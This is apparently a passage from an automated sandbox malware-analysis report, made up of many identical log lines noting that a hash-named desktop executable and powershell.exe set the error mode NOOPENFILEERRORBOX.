                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
